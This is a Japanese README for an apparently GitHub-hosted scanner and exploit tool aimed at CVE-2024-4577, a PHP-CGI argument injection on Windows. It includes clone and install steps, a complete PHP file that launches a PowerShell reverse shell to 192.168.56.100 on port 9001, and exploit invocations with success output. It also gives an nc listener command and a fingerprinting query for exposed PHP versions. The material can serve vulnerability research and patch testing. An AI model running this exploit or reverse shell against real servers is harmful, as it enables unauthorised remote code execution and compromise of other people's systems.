
PoC - PHP CGI 引数インジェクション CVE-2024-4577 (スキャナーおよびエクスプロイト)
PHP バージョン 8.1.(8.1.29 未満)、8.2.(8.2.20 未満)、8.3.*(8.3.8 未満)において、Windows 上で Apache と PHP-CGI を使用している場合、システムが特定のコードページを使用するように設定されていると、Windows は Win32 API 関数に渡されるコマンドラインの文字を置き換えるために「ベストフィット」動作を使用することがあります。PHP CGI モジュールはこれらの文字を PHP オプションと誤って解釈し、悪意のあるユーザーが実行中の PHP バイナリにオプションを渡すことを許し、その結果スクリプトのソースコードを公開したり、サーバー上で任意の PHP コードを実行したりする可能性があります。
「XAMPP はデフォルト構成で脆弱であり、/php-cgi/php-cgi.exe エンドポイントをターゲットにできます。明示的な .php エンドポイント(例:/index.php)をターゲットにするには、サーバーが PHP スクリプトを CGI モードで実行するように設定されている必要があります。」
$ git clone https://github.com/l0n3m4n/CVE-2024-4577-RCE.git
$ cd CVE-2024-4577-RCE && pip install -r requirements.txt

[!NOTE] このツールは実際の攻撃と手法(TTP)を示しています。ただし、この特定のペイロードサンプルはこのシナリオでは機能しません。shell.php を修正して完全に機能するペイロードを入手してください。
# rev_shell.php
<?php
$payload = "powershell -c \"\$client = New-Object System.Net.Sockets.TCPClient('192.168.56.100', 9001);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()\";
exec($payload);
?>
$ python3 CVE-2024-4577.py -s -t https://target.com/
_____ _____ _____ _____ _____ _____ _____ _ _
| _ | | | _ | | __| |___ ___ ___ ___| |___ |_|___ ___| |_
| __| | __| --| | |- -|___| .'| _| . |- -| | | | -_| _| _|
|__| |__|__|__| |_____|_____|_____| |__,|_| |_ |_____|_|_|_| |___|___|_|
|___| |___|
Author: l0n3m4n | CVE-2024-4577 | PoC and Scanner
[+] Target https://target.com is vulnerable to CVE-2024-4577
$ python3 CVE-2024-4577.py -t http://example.com -e -p rev_shell.php
_____ _____ _____ _____ _____ _____ _____ _ _
| _ | | | _ | | __| |___ ___ ___ ___| |___ |_|___ ___| |_
| __| | __| --| | |- -|___| .'| _| . |- -| | | | -_| _| _|
|__| |__|__|__| |_____|_____|_____| |__,|_| |_ |_____|_|_|_| |___|___|_|
|___| |___|
Author: l0n3m4n | CVE-2024-4577 | PoC and Scanner
[+] Exploit successful!
$ nc -lvnp 9001
server: PHP 8.1, server: PHP 8.2, server: PHP 8.3protocol="http" && header="X-Powered-By: PHP/8.1" || header="X-Powered-By: PHP/8.2" || header="X-Powered-By: PHP/8.3"このツールは教育および研究目的のみで提供されています。作成者は、このツールの誤用または損害について一切の責任を負いません。 Issueを作成